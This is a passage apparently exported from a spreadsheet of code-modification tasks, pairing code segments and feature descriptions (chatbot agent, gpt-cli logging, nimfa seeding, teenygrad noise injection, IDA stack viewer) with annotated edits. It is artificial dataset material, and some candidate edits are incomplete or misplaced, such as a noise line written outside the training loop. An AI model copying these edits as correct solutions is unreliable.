bests = torch.multinomial(probs, 1).view(-1)\n            else:\n                bests = beam_scores.argmax(dim=-1)\n            \n            for i in range(batch_size):\n                best_len = beam_lens[i, bests[i]]\n                best_seq = result[i, bests[i], 1:best_len-1]\n                predicts.append(best_seq.tolist())\n                \n        return predicts\n\n# File 2: transformer_chatbot/agent.py\n# #Modify: Update batch_act method to preprocess contexts\n\ndef batch_act(self, observations):\n    def is_valid_history(history):\n        return len(history[\'dialog\'])\n\n    def to_tensor(string):\n        ids = [self.vocab.bos_id] + self.vocab.string2ids(string) + [self.vocab.eos_id]\n        return torch.tensor(ids, dtype=torch.long)\n\n    batch_reply = [{\'id\': self.getID(), \'text\': \'\', \'text_candidates\': []} for _ in range(len(observations))]\n    valid_ids = [i for i, obs in enumerate(observations) if is_valid_history(obs[\'agent\'].history)]\n    batch_size = len(valid_ids)\n\n    if batch_size == 0:\n        return batch_reply\n\n    try:\n        valid_observations = [observations[i] for i in valid_ids]\n\n        infos = [obs[\'agent\'].history[\'info\'][:self.model.n_pos_embeddings-3] for obs in valid_observations]\n        infos = [([self.vocab.info_bos_id] + ifo + [self.vocab.info_eos_id] if len(ifo) else ifo) for ifo in infos]\n        dialogs = [list(obs[\'agent\'].history[\'dialog\'])[-self.model.n_pos_embeddings+1:] for obs in valid_observations]\n        contexts = []\n\n        if max(map(len, infos)) &gt; 0:\n            infos = [torch.tensor(i, dtype=torch.long) for i in infos]\n            infos = pad_sequence(infos, batch_first=True, padding_value=self.model.padding_idx)\n            if self.use_cuda:\n                infos = infos.cuda()\n            contexts.append(infos)\n\n        if max(map(len, dialogs)) &gt; 0:\n            dialogs = [torch.tensor(d, dtype=torch.long) for d in dialogs]\n            dialogs = pad_sequence(dialogs, batch_first=True, padding_value=self.model.padding_idx)\n            if self.use_cuda:\n                dialogs = dialogs.cuda()\n            contexts.append(dialogs)\n\n        enc_contexts = [self.model.encode(c) for c in contexts]\n        # #Modify: Pass preprocessed contexts to beam_search\n        pred_texts = self.model.beam_search(enc_contexts)\n\n        for i in range(batch_size):\n            pred_text_str, pred_text = self._postprocess_text(pred_texts[i], valid_observations[i][\'agent\'])\n\n            valid_observations[i][\'agent\'].history[\'dialog\'].extend([self.vocab.talker2_bos_id] +\n                                                                    pred_text +\n                                                                    [self.vocab.talker2_eos_id])\n            batch_reply[valid_ids[i]][\'text\'] = pred_text_str\n            batch_reply[valid_ids[i]][\'episode_done\'] = valid_observations[i][\'agent\'].episode_done\n\n        if self.opt[\'rank_candidates\']:\n            candidates = [list(obs.get(\'label_candidates\', [])) for obs in valid_observations]\n            lens_candidates = [len(c) for c in candidates]\n\n            if max(lens_candidates) &gt; 0:\n                candidates = [c + [\'\' for _ in range(max(lens_candidates) - len(c))] for c in candidates]\n                scores = [[] for _ in range(len(candidates))]\n\n                for i in range(max(lens_candidates)):\n                    current_cands = [to_tensor(c[i])[:self.model.n_pos_embeddings-1] for c in candidates]\n                    current_cands = pad_sequence(current_cands, batch_first=True, padding_value=self.model.padding_idx)\n                    if self.use_cuda:\n                        current_cands = current_cands.cuda()\n\n                    logits = self.model.decode(current_cands[:, :-1], enc_contexts)\n                    log_probas = F.log_softmax(logits, dim=-1)\n                    log_probas = torch.gather(log_probas, -1, current_cands[:, 1:].unsqueeze(-1)).squeeze(-1)\n                    log_probas.masked_fill_(current_cands[:, 1:].eq(self.model.padding_idx), 0)\n\n                    current_lens = current_cands[:, 1:].ne(self.model.padding_idx).float().sum(dim=-1)\n                    current_scores = log_probas.sum(dim=-1) / current_lens\n\n                    for k, s in enumerate(current_scores):\n                        if i &lt; lens_candidates[k]:\n                            scores[k].append(s.item())\n\n                ranked_ids = [sorted(range(len(s)), key=lambda k: s[k], reverse=True) for s in scores]\n                ranked_strings = [[c[i] for i in ids] for ids, c in zip(ranked_ids, candidates)]\n\n                for i in range(batch_size):\n                    batch_reply[valid_ids[i]][\'text_candidates\'] = ranked_strings[i]\n\n    except Exception as e:\n        print(e)\n\n    return batch_reply'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def predict(self, contexts=[]):\n    #Modify\n    processed_contexts = [new_feature_function(c) for c in contexts]\n    enc_contexts = [self.encode(c) for c in processed_contexts]\n    prediction = self.beam_search(enc_contexts)\n    return prediction', '#file 2': 'def act(self):\n    return self.batch_act([self.observation])[0]', '#file 3': 'def batch_act(self, observations):\n    ...\n    #Modify\n    processed_contexts = [new_feature_function(c) for c in contexts]\n    enc_contexts = [self.model.encode(c) for c in processed_contexts]\n    pred_texts = self.model.beam_search(enc_contexts)\n    ...', '#file 4': "#New\nimport re\ndef new_feature_function(text):\n    # Remove special characters and normalize text\n    processed_text = re.sub(r'[^a-zA-Z0-9\\s]', '', text).lower()\n    return processed_text"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class LoggingChatListener(ChatListener):\n    def __init__(self):\n        self.logger = logging.getLogger("gptcli-session")\n\n    def on_chat_message(self, message: Message):\n        self.logger.info(f"{message[\'role\']}: {message[\'content\']}")', 'invoking_code_segment': 'class CLIChatSession(ChatSession):\n    def __init__(self, assistant: Assistant, markdown: bool, show_price: bool):\n        listeners = [\n            CLIChatListener(markdown),\n            LoggingChatListener(),\n        ]\n        if show_price:\n            listeners.append(PriceChatListener(assistant))\n        listener = CompositeChatListener(listeners)\n        super().__init__(assistant, listener)', 'feature_description': "Add a new feature to log messages with a prefix 'New Feature' to distinguish feature-related messages from regular chat messages in the logging system.", 'modified_complete_code': '# File 1: gpt-cli/gptcli/logging.py\nimport logging\nfrom gptcli.completion import Message\nfrom gptcli.session import ChatListener\n\n\nclass LoggingChatListener(ChatListener):\n    def __init__(self, enable_feature_prefix: bool = False):\n        self.logger = logging.getLogger("gptcli-session")\n        self.enable_feature_prefix = enable_feature_prefix  # #New\n\n    def on_chat_start(self):\n        self.logger.info("Chat started")\n\n    def on_chat_clear(self):\n        self.logger.info("Cleared the conversation.")\n\n    def on_chat_rerun(self, success: bool):\n        if success:\n            self.logger.info("Re-generating the last message.")\n\n    def on_error(self, e: Exception):\n        self.logger.exception(e)\n\n    def on_chat_message(self, message: Message):\n        # #Modify: Add prefix support for feature logging\n        prefix = "[New Feature] " if self.enable_feature_prefix else ""\n        self.logger.info(f"{prefix}{message[\'role\']}: {message[\'content\']}")\n\n    # #New: New method to enable feature prefix logging\n    def set_feature_prefix(self, enable: bool):\n        self.enable_feature_prefix = enable\n\n\n# File 2: gpt-cli/gptcli/gpt.py\n# ... (previous imports and code remain the same) ...\n\nclass CLIChatSession(ChatSession):\n    def __init__(self, assistant: Assistant, markdown: bool, show_price: bool, enable_feature_logging: bool = False):  # #Modify: Added enable_feature_logging parameter\n        listeners = [\n            CLIChatListener(markdown),\n            LoggingChatListener(enable_feature_prefix=enable_feature_logging),  # #Modify: Pass feature logging flag\n        ]\n\n        if show_price:\n            listeners.append(PriceChatListener(assistant))\n\n        listener = CompositeChatListener(listeners)\n        super().__init__(assistant, listener)\n\n\ndef run_interactive(args, assistant):\n    logger.info("Starting a new chat session. Assistant config: %s", assistant.config)\n    # #Modify: Pass feature logging flag to CLIChatSession\n    session = CLIChatSession(\n        assistant=assistant, \n        markdown=args.markdown, \n        show_price=args.show_price,\n        enable_feature_logging=getattr(args, \'feature_logging\', False)  # #New: Support feature logging flag\n    )\n    history_filename = os.path.expanduser("~/.config/gpt-cli/history")\n    os.makedirs(os.path.dirname(history_filename), exist_ok=True)\n    input_provider = CLIUserInputProvider(history_filename=history_filename)\n    session.loop(input_provider)\n\n\ndef parse_args(config: GptCliConfig):\n    parser = argparse.ArgumentParser(\n        description="Run a chat session with ChatGPT. See https://github.com/kharvd/gpt-cli for more information."\n    )\n    # ... (previous arguments) ...\n    parser.add_argument(\n        "--no_price",\n        action="store_false",\n        dest="show_price",\n        help="Disable price logging.",\n        default=config.show_price,\n    )\n    # #New: Add feature logging argument\n    parser.add_argument(\n        "--feature_logging",\n        action="store_true",\n        dest="feature_logging",\n        help="Enable feature prefix logging for messages.",\n        default=False,\n    )\n    parser.add_argument(\n        "--version",\n        "-v",\n        action="version",\n        version=f"gpt-cli v{gptcli.__version__}",\n        help="Print the version number and exit.",\n    )\n\n    return parser.parse_args()'}</t>
  </si>
  <si>
    <t>{'file_1': 'class LoggingChatListener(ChatListener):\n    def __init__(self):\n        self.logger = logging.getLogger("gptcli-session")\n\n    def on_chat_start(self):\n        self.logger.info("Chat started")\n\n    def on_chat_clear(self):\n        self.logger.info("Cleared the conversation.")\n\n    def on_chat_rerun(self, success: bool):\n        if success:\n            self.logger.info("Re-generating the last message.")\n\n    def on_error(self, e: Exception):\n        self.logger.exception(e)\n\n    def on_chat_message(self, message: Message):\n        self.logger.info(f"{message[\'role\']}: {message[\'content\']}")', 'file_2': 'def run_interactive(args, assistant):\n    logger.info("Starting a new chat session. Assistant config: %s", assistant.config)\n    session = CLIChatSession(\n        assistant=assistant, markdown=args.markdown, show_price=args.show_price\n    )\n    history_filename = os.path.expanduser("~/.config/gpt-cli/history")\n    os.makedirs(os.path.dirname(history_filename), exist_ok=True)\n    input_provider = CLIUserInputProvider(history_filename=history_filename)\n    session.loop(input_provider)', 'file_3': 'class CLIChatSession(ChatSession):\n    def __init__(self, assistant: Assistant, markdown: bool, show_price: bool):\n        listeners = [\n            CLIChatListener(markdown),\n            LoggingChatListener(),\n        ]\n\n        if show_price:\n            listeners.append(PriceChatListener(assistant))\n\n        #Modify: Add new feature listener\n        listeners.append(NewFeatureChatListener())\n\n        listener = CompositeChatListener(listeners)\n        super().__init__(assistant, listener)', 'file_4': 'class NewFeatureChatListener(ChatListener):\n    def __init__(self):\n        self.logger = logging.getLogger("gptcli-new-feature")\n\n    def on_chat_message(self, message: Message):\n        self.logger.info(f"New Feature: {message[\'role\']}: {message[\'content\']}")'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'Random_c.initialize(self, V, rank, options) method in nimfa/nimfa/methods/seeding/random_c.py', 'invoking_code_segment': 'Smf._compatibility(self) method in nimfa/nimfa/models/smf.py which calls seeding.methods[self.seed]()', 'feature_description': 'Add a custom seeding method to initialize the basis and mixture matrices by extending the Random_c class with a new CustomSeeding class that allows users to provide custom initialization logic while maintaining compatibility with the existing seeding framework.', 'modified_complete_code': '# File 1: nimfa/nimfa/methods/seeding/random_c.py\n"""\n#######################################\nRandom_c (``methods.seeding.random_c``)\n#######################################\n\nRandom C [Albright2006]_ is inexpensive initialization method for nonnegative\nmatrix factorization. It is inspired by the C matrix in of the CUR decomposition.\nThe Random C initialization is similar to the Random Vcol method (see\nmod:`methods.seeding.random_vcol`) except it chooses p columns at random from\nthe longest (in 2-norm) columns in target matrix (V), which generally means the\nmost dense columns of target matrix.\n\nInitialization of each column of basis matrix is done by averaging p random\ncolumns of l longest columns of target matrix. Initialization\nof mixture matrix is similar except for row operations.    \n"""\n\nfrom nimfa.utils.linalg import *\n\n__all__ = [\'Random_c\', \'CustomSeeding\']\n\n\nclass Random_c(object):\n\n    def __init__(self):\n        self.name = "random_c"\n\n    def initialize(self, V, rank, options):\n        """\n        Return initialized basis and mixture matrix. Initialized matrices are\n        of the same type as passed target matrix.\n        \n        :param V: Target matrix, the matrix for MF method to estimate. \n        :type V: One of the :class:`scipy.sparse` sparse matrices types or or\n                :class:`numpy.matrix`\n        :param rank: Factorization rank. \n        :type rank: `int`\n        :param options: Specify the algorithm and model specific options (e.g. initialization of\n                extra matrix factor, seeding parameters).\n\n                Option ``p_c`` represents the number of columns of target matrix\n                used to average the column of basis matrix. Default\n                value for ``p_c`` is 1/5 * (target.shape[1]).\n\n                Option ``p_r`` represents the number of rows of target matrix used\n                to average the row of basis matrix. Default value for\n                ``p_r`` is 1/5 * (target.shape[0]).\n\n                Option ``l_c`` represents the first l_c columns of target matrix sorted\n                descending by length (2-norm). Default value for ``l_c`` is  1/2 * (target.shape[1]).\n\n                Option ``l_r`` represent first l_r rows of target matrix sorted\n                descending by length (2-norm). Default value for\n                ``l_r`` is 1/2 * (target.shape[0]).\n        :type options: `dict`\n        """\n        self.rank = rank\n        self.p_c = options.get(\'p_c\', int(ceil(1. / 5 * V.shape[1])))\n        self.p_r = options.get(\'p_r\', int(ceil(1. / 5 * V.shape[0])))\n        self.l_c = options.get(\'l_c\', int(ceil(1. / 2 * V.shape[1])))\n        self.l_r = options.get(\'l_r\', int(ceil(1. / 2 * V.shape[0])))\n        self.prng = np.random.RandomState()\n        if sp.isspmatrix(V):\n            self.W = sp.lil_matrix((V.shape[0], self.rank))\n            self.H = sp.lil_matrix((self.rank, V.shape[1]))\n            top_c = sorted(enumerate([norm(V[:, i], 2)\n                           for i in range(V.shape[1])]), key=itemgetter(1), reverse=True)[:self.l_c]\n            top_r = sorted(\n                enumerate([norm(V[i, :], 2) for i in range(V.shape[0])]), key=itemgetter(1), reverse=True)[:self.l_r]\n        else:\n            self.W = np.mat(np.zeros((V.shape[0], self.rank)))\n            self.H = np.mat(np.zeros((self.rank, V.shape[1])))\n            top_c = sorted(enumerate([norm(V[:, i], 2)\n                           for i in range(V.shape[1])]), key=itemgetter(1), reverse=True)[:self.l_c]\n            top_r = sorted(\n                enumerate([norm(V[i, :], 2) for i in range(V.shape[0])]), key=itemgetter(1), reverse=True)[:self.l_r]\n        top_c = np.mat(list(zip(*top_c))[0])\n        top_r = np.mat(list(zip(*top_r))[0])\n        for i in range(self.rank):\n            self.W[:, i] = V[\n                :, top_c[0, self.prng.randint(low=0, high=self.l_c, size=self.p_c)].tolist()[0]].mean(axis=1)\n            self.H[i, :] = V[\n                top_r[0, self.prng.randint(low=0, high=self.l_r, size=self.p_r)].tolist()[0], :].mean(axis=0)\n        # return sparse or dense initialization\n        if sp.isspmatrix(V):\n            return self.W.tocsr(), self.H.tocsr()\n        else:\n            return self.W, self.H\n\n    def __repr__(self):\n        return "random_c.Random_c()"\n\n    def __str__(self):\n        return self.name\n\n\n#New: CustomSeeding class for user-defined initialization logic\nclass CustomSeeding(object):\n    """\n    Custom seeding method that allows users to provide their own initialization logic\n    for basis and mixture matrices.\n    \n    Users can subclass this and override the initialize method to implement custom\n    initialization strategies.\n    """\n    \n    def __init__(self, init_func=None):\n        """\n        Initialize CustomSeeding with optional custom initialization function.\n        \n        :param init_func: Optional callable that takes (V, rank, options) and returns (W, H)\n        :type init_func: callable or None\n        """\n        self.name = "custom_seeding"\n        self.init_func = init_func\n    \n    def initialize(self, V, rank, options):\n        """\n        Return initialized basis and mixture matrix using custom logic.\n        \n        :param V: Target matrix\n        :type V: scipy.sparse matrix or numpy.matrix\n        :param rank: Factorization rank\n        :type rank: int\n        :param options: Algorithm and model specific options\n        :type options: dict\n        :return: Initialized basis matrix W and mixture matrix H\n        :rtype: tuple of (W, H)\n        """\n        if self.init_func is not None:\n            return self.init_func(V, rank, options)\n        else:\n            # Default: random initialization if no custom function provided\n            if sp.isspmatrix(V):\n                W = sp.lil_matrix((V.shape[0], rank))\n                H = sp.lil_matrix((rank, V.shape[1]))\n                W.data = [np.random.rand(len(row)) for row in W.rows]\n                H.data = [np.random.rand(len(row)) for row in H.rows]\n                return W.tocsr(), H.tocsr()\n            else:\n                W = np.mat(np.random.rand(V.shape[0], rank))\n                H = np.mat(np.random.rand(rank, V.shape[1]))\n                return W, H\n    \n    def set_init_func(self, init_func):\n        """\n        Set the custom initialization function.\n        \n        :param init_func: Callable that takes (V, rank, options) and returns (W, H)\n        :type init_func: callable\n        """\n        self.init_func = init_func\n    \n    def __repr__(self):\n        return "random_c.CustomSeeding()"\n    \n    def __str__(self):\n        return self.name\n\n\n# File 2: nimfa/nimfa/methods/seeding/__init__.py\n"""\n    This package contains implementations of initialization methods for matrix factorization.\n"""\n\nfrom .nndsvd import *\nfrom .random import *\nfrom .fixed import *\nfrom .random_c import *\nfrom .random_vcol import *\n\n#Modify: Added CustomSeeding to methods dictionary\nmethods = {"random": Random,\n           "fixed": Fixed,\n           "nndsvd": Nndsvd,\n           "random_c": Random_c,\n           "random_vcol": Random_vcol,\n           "custom_seeding": CustomSeeding,\n           "none": None}\n\n\n# File 3: nimfa/nimfa/models/smf.py (relevant modifications)\n"""\n    #####################\n    Smf (``models.smf``)\n    #####################\n"""\n\nimport nimfa.utils.utils as utils\nfrom nimfa.utils.linalg import *\nfrom nimfa.methods import seeding\n\n\nclass Smf(object):\n    """\n    This class defines a common interface / model to handle standard MF models in\n    a generic way.\n    \n    It contains definitions of the minimum set of generic methods that are used in \n    common computations and matrix factorizations. Besides it contains some quality\n    and performance measures about factorizations.\n    """\n    def __init__(self, params):\n        self.model_name = "smf"\n        self.__dict__.update(params)\n        self.V1 = None\n        self.H1 = None\n        # do not copy target and factor matrices into the program\n        if sp.isspmatrix(self.V):\n            self.V = self.V.tocsr().astype(\'d\')\n        else:\n            self.V = np.asmatrix(self.V) if self.V.dtype == np.dtype(\n                float) else np.asmatrix(self.V, dtype=\'d\')\n        if self.W is not None or self.H is not None or self.H1 is not None:\n            raise utils.MFError("Fixed initialized is not supported by SMF model.")\n        self._compatibility()\n\n    def __call__(self):\n        """Run the specified MF algorithm."""\n        return self.factorize()\n\n    def basis(self):\n        """Return the matrix of basis vectors (factor 1 matrix)."""\n        return self.W\n\n    def target(self, idx=None):\n        """\n        Return the target matrix to estimate.\n        \n        :param idx: Used in the multiple MF model. In standard MF ``idx`` is always None.\n        :type idx: None\n        """\n        return self.V\n\n    def coef(self, idx=None):\n        """\n        Return the matrix of mixture coefficients (factor 2 matrix).\n        \n        :param idx: Used in the multiple MF model. In standard MF ``idx`` is always None.\n        :type idx: None\n        """\n        return self.H\n\n    def fitted(self, idx=None):\n        """\n        Compute the estimated target matrix according to the MF algorithm model.\n        \n        :param idx: Used in the multiple MF model. In standard MF ``idx`` is always None.\n        :type idx: None\n        """\n        return dot(self.W, self.H)\n\n    def distance(self, metric=\'euclidean\', idx=None):\n        """\n        Return the loss function value.\n        \n        :param distance: Specify distance metric to be used. Possible are Euclidean and\n           Kullback-Leibler (KL) divergence. Strictly, KL is not a metric.\n        :type distance: `str` with values \'euclidean\' or \'kl\'\n\n        :param idx: Used in the multiple MF model. In standard MF ``idx`` is always None.\n        :type idx: None\n        """\n        if metric.lower() == \'euclidean\':\n            R = self.V - dot(self.W, self.H)\n            return power(R, 2).sum()\n        elif metric.lower() == \'kl\':\n            Va = dot(self.W, self.H)\n            return (multiply(self.V, sop(elop(self.V, Va, div), op=log)) - self.V + Va).sum()\n        else:\n            raise utils.MFError("Unknown distance metric.")\n\n    def residuals(self, idx=None):\n        """\n        Return residuals matrix between the target matrix and its MF estimate.\n        \n        :param idx: Used in the multiple MF model. In standard MF ``idx`` is always None.\n        :type idx: None\n        """\n        return self.V - dot(self.W, self.H)\n\n    def _compatibility(self):\n        """\n        Check if chosen seeding method is compatible with chosen factorization\n        method or fixed initialization is passed.\n\n        :param mf_model: The underlying initialized model of matrix factorization.\n        :type mf_model: Class inheriting :class:`models.nmf.Nmf`\n        """\n        W = self.basis()\n        H = self.coef(0)\n        H1 = self.coef(1) if self.model_name == \'mm\' else None\n        if self.seed is None and W is None and H is None and H1 is None:\n            self.seed = None if "none" in self.aseeds else "random"\n        if W is not None and H is not None:\n            if self.seed is not None and self.seed is not "fixed":\n                raise utils.MFError("Initial factorization is fixed.")\n            else:\n                self.seed = seeding.fixed.Fixed()\n                self.seed._set_fixed(W=W, H=H, H1=H1)\n        self.__is_smdefined()\n        self.__compatibility()\n\n    def __is_smdefined(self):\n        """Check if MF and seeding methods are well defined."""\n        if isinstance(self.seed, str):\n            if self.seed in seeding.methods:\n                #Modify: Support instantiation of CustomSeeding with optional parameters\n                if self.seed == "custom_seeding":\n                    custom_init_func = getattr(self, \'custom_init_func\', None)\n                    self.seed = seeding.methods[self.seed](init_func=custom_init_func)\n                else:\n                    self.seed = seeding.methods[self.seed]()\n            else:\n                raise utils.MFError("Unrecognized seeding method.")\n        else:\n            if not str(self.seed).lower() in seeding.methods:\n                raise utils.MFError("Unrecognized seeding method.")\n\n    def __compatibility(self):\n        """Check if MF model is compatible with the seeding method."""\n        if not str(self.seed).lower() in self.aseeds:\n            raise utils.MFError("MF model is incompatible with the seeding method.")\n'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def train(model, X_train, Y_train, optim, steps, BS=128, lossfn=lambda out,y: out.sparse_categorical_crossentropy(y), transform=lambda x: x, target_transform=lambda x: x, noloss=False)', 'invoking_code_segment': 'train(model, X_train, Y_train, optimizer, steps=100)', 'feature_description': 'Add noise to the input data during training to improve model robustness by introducing Gaussian noise to training samples with a configurable noise level parameter', 'modified_complete_code': '# teenygrad/mnist.py - MODIFIED\n#!/usr/bin/env python3\nimport numpy as np\nfrom teenygrad import Tensor\nfrom tqdm import trange\nimport gzip, os\n\nfrom teenygrad.nn import optim\nfrom teenygrad.helpers import getenv\n\n#New - Add noise_level parameter to train function\ndef train(model, X_train, Y_train, optim, steps, BS=128, lossfn=lambda out,y: out.sparse_categorical_crossentropy(y),\n        transform=lambda x: x, target_transform=lambda x: x, noloss=False, noise_level=0.0):\n  Tensor.training = True\n  losses, accuracies = [], []\n  for i in (t := trange(steps, disable=getenv(\'CI\', False))):\n    samp = np.random.randint(0, X_train.shape[0], size=(BS))\n    #Modify - Add Gaussian noise to input data during training\n    x_data = X_train[samp]\n    if noise_level &gt; 0:\n      noise = np.random.normal(0, noise_level, x_data.shape)\n      x_data = np.clip(x_data + noise, 0, 255)  # Clip to valid range for image data\n    x = Tensor(transform(x_data), requires_grad=False)\n    y = Tensor(target_transform(Y_train[samp]))\n\n    # network\n    out = model.forward(x) if hasattr(model, \'forward\') else model(x)\n\n    loss = lossfn(out, y)\n    optim.zero_grad()\n    loss.backward()\n    if noloss: del loss\n    optim.step()\n\n    # printing\n    if not noloss:\n      cat = np.argmax(out.numpy(), axis=-1)\n      accuracy = (cat == y.numpy()).mean()\n\n      loss = loss.detach().numpy()\n      losses.append(loss)\n      accuracies.append(accuracy)\n      t.set_description("loss %.2f accuracy %.2f" % (loss, accuracy))\n  return [losses, accuracies]\n\ndef evaluate(model, X_test, Y_test, num_classes=None, BS=128, return_predict=False, transform=lambda x: x,\n             target_transform=lambda y: y):\n  Tensor.training = False\n  def numpy_eval(Y_test, num_classes):\n    Y_test_preds_out = np.zeros(list(Y_test.shape)+[num_classes])\n    for i in trange((len(Y_test)-1)//BS+1, disable=getenv(\'CI\', False)):\n      x = Tensor(transform(X_test[i*BS:(i+1)*BS]))\n      out = model.forward(x) if hasattr(model, \'forward\') else model(x)\n      Y_test_preds_out[i*BS:(i+1)*BS] = out.numpy()\n    Y_test_preds = np.argmax(Y_test_preds_out, axis=-1)\n    Y_test = target_transform(Y_test)\n    return (Y_test == Y_test_preds).mean(), Y_test_preds\n\n  if num_classes is None: num_classes = Y_test.max().astype(int)+1\n  acc, Y_test_pred = numpy_eval(Y_test, num_classes)\n  print("test set accuracy is %f" % acc)\n  return (acc, Y_test_pred) if return_predict else acc\n\ndef fetch_mnist():\n  parse = lambda file: np.frombuffer(gzip.open(file).read(), dtype=np.uint8).copy()\n  BASE = os.path.dirname(__file__)+"/extra/datasets"\n  X_train = parse(BASE+"/mnist/train-images-idx3-ubyte.gz")[0x10:].reshape((-1, 28*28)).astype(np.float32)\n  Y_train = parse(BASE+"/mnist/train-labels-idx1-ubyte.gz")[8:]\n  X_test = parse(BASE+"/mnist/t10k-images-idx3-ubyte.gz")[0x10:].reshape((-1, 28*28)).astype(np.float32)\n  Y_test = parse(BASE+"/mnist/t10k-labels-idx1-ubyte.gz")[8:]\n  return X_train, Y_train, X_test, Y_test\n\nX_train, Y_train, X_test, Y_test = fetch_mnist()\n\n# create a model with a conv layer\nclass TinyConvNet:\n  def __init__(self):\n    # https://keras.io/examples/vision/mnist_convnet/\n    conv = 3\n    #inter_chan, out_chan = 32, 64\n    inter_chan, out_chan = 8, 16   # for speed\n    self.c1 = Tensor.scaled_uniform(inter_chan,1,conv,conv)\n    self.c2 = Tensor.scaled_uniform(out_chan,inter_chan,conv,conv)\n    self.l1 = Tensor.scaled_uniform(out_chan*5*5, 10)\n\n  def forward(self, x:Tensor):\n    x = x.reshape(shape=(-1, 1, 28, 28)) # hacks\n    x = x.conv2d(self.c1).relu().max_pool2d()\n    x = x.conv2d(self.c2).relu().max_pool2d()\n    x = x.reshape(shape=[x.shape[0], -1])\n    return x.dot(self.l1).log_softmax()\n\nif __name__ == "__main__":\n  np.random.seed(1337)\n  model = TinyConvNet()\n  optimizer = optim.Adam([model.c1, model.c2, model.l1], lr=0.001)\n  #Modify - Pass noise_level parameter to train function for improved robustness\n  train(model, X_train, Y_train, optimizer, steps=100, noise_level=0.1)\n  assert evaluate(model, X_test, Y_test) &gt; 0.93'}</t>
  </si>
  <si>
    <t>{'#file 1': 'class TinyConvNet:\n  def __init__(self):\n    # https://keras.io/examples/vision/mnist_convnet/\n    conv = 3\n    #inter_chan, out_chan = 32, 64\n    inter_chan, out_chan = 8, 16   # for speed\n    self.c1 = Tensor.scaled_uniform(inter_chan,1,conv,conv)\n    self.c2 = Tensor.scaled_uniform(out_chan,inter_chan,conv,conv)\n    self.l1 = Tensor.scaled_uniform(out_chan*5*5, 10)\n\n  def forward(self, x:Tensor):\n    x = x.reshape(shape=(-1, 1, 28, 28)) # hacks\n    x = x.conv2d(self.c1).relu().max_pool2d()\n    x = x.conv2d(self.c2).relu().max_pool2d()\n    x = x.reshape(shape=[x.shape[0], -1])\n    return x.dot(self.l1).log_softmax()', '#file 2': 'from new_file import add_noise #New\n\ndef train(model, X_train, Y_train, optim, steps, BS=128, lossfn=lambda out,y: out.sparse_categorical_crossentropy(y),\n        transform=lambda x: x, target_transform=lambda x: x, noloss=False):\n  Tensor.training = True\n  losses, accuracies = [], []\n  for i in (t := trange(steps, disable=getenv(\'CI\', False))):\n    samp = np.random.randint(0, X_train.shape[0], size=(BS))\n    x = Tensor(transform(X_train[samp]), requires_grad=False)\n    y = Tensor(target_transform(Y_train[samp]))\n\n    # network\n    out = model.forward(x) if hasattr(model, \'forward\') else model(x)\n\n    loss = lossfn(out, y)\n    optim.zero_grad()\n    loss.backward()\n    if noloss: del loss\n    optim.step()\n\n    # printing\n    if not noloss:\n      cat = np.argmax(out.numpy(), axis=-1)\n      accuracy = (cat == y.numpy()).mean()\n\n      loss = loss.detach().numpy()\n      losses.append(loss)\n      accuracies.append(accuracy)\n      t.set_description("loss %.2f accuracy %.2f" % (loss, accuracy))\n\n#Modify\n    x = Tensor(add_noise(transform(X_train[samp])), requires_grad=False)', '#file 3': 'def evaluate(model, X_test, Y_test, num_classes=None, BS=128, return_predict=False, transform=lambda x: x,\n             target_transform=lambda y: y):\n  Tensor.training = False\n  def numpy_eval(Y_test, num_classes):\n    Y_test_preds_out = np.zeros(list(Y_test.shape)+[num_classes])\n    for i in trange((len(Y_test)-1)//BS+1, disable=getenv(\'CI\', False)):\n      x = Tensor(transform(X_test[i*BS:(i+1)*BS]))\n      out = model.forward(x) if hasattr(model, \'forward\') else model(x)\n      Y_test_preds_out[i*BS:(i+1)*BS] = out.numpy()\n    Y_test_preds = np.argmax(Y_test_preds_out, axis=-1)\n    Y_test = target_transform(Y_test)\n    return (Y_test == Y_test_preds).mean(), Y_test_preds\n\n  if num_classes is None: num_classes = Y_test.max().astype(int)+1\n  acc, Y_test_pred = numpy_eval(Y_test, num_classes)\n  print("test set accuracy is %f" % acc)\n  return (acc, Y_test_pred) if return_predict else acc', '#file 4': 'def add_noise(x):\n    noise = np.random.normal(0, 0.1, x.shape)\n    return x + noise'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'config.n_stack_entries and config.max_deref_levels in StackViewer.reload_info() and StackViewer.parse_value()', 'invoking_code_segment': 'StackViewer class methods that access config module attributes', 'feature_description': 'Add a new feature to invoke a callback function that prints a message when the stack information is reloaded. This allows external code to be notified when reload_info() completes successfully.', 'modified_complete_code': '# Modified config.py\narrow_symbol      = "-&gt;"\nshow_leyend       = True\nmin_string_len    = 3\nmax_string_len    = 50\nmax_deref_levels  = 2\nderef_limit       = 20\nshow_area_name    = True\nhighlight_changes = True\nhighlight_color   = 0xFFD073\nn_stack_entries   = 150\n#New\non_stack_reload_callback = None\n\n# Modified stack.py\nimport idc\nimport idaapi\nimport ida_bytes\n\nfrom dereferencing import dbg, config, actions\n\nfrom dereferencing.constants import *\nfrom dereferencing.views import CustViewer\nfrom dereferencing.actions import ActionHandler\n\n#New\ndef default_reload_message():\n    """Default callback function that prints reload message"""\n    print("[deREferencing] Stack information reloaded successfully")\n\nclass StackViewer(CustViewer):\n    def __init__(self, parent=None):\n        super(StackViewer, self).__init__()\n        self.parent = parent\n        self.base_expr = None\n        self.hook = None\n        self.menu_actions = []\n        dbg.initialize()\n        #New\n        if config.on_stack_reload_callback is None:\n            config.on_stack_reload_callback = default_reload_message\n\n    def jump_to(self):\n        current = self.base_expr if self.base_expr is not None else ""\n        b = idaapi.ask_str(current, 0, "Sync with")\n        if b and len(b) &gt; 0:\n            try:\n                self.base_expr = b\n                self.reload_info()\n            except:\n                idaapi.warning("Invalid expression")\n        else:\n            self.base_addr = None\n\n    def set_stack_entries(self):\n        value = idaapi.ask_long(config.n_stack_entries, "Set the number of stack entries to show")\n        if value is not None:\n            if value &lt;= 0:\n                idaapi.warning("Negative values are not allowed")\n                return False\n            config.n_stack_entries = value\n            self.reload_info()\n            return True\n        return False\n\n    def modify_value(self):\n        ea = self.get_current_expr_ea()\n        if not ea or not idaapi.is_loaded(ea):\n            return\n        stack_val = 0\n        if idaapi.inf_is_64bit():\n            stack_val = ida_bytes.get_qword(ea)\n        else:\n            stack_val = ida_bytes.get_dword(ea)\n        b = idaapi.ask_str("0x%X" % stack_val, 0, "Modify value")\n        if b is not None:\n            try:\n                value = int(idaapi.str2ea(b))\n                if 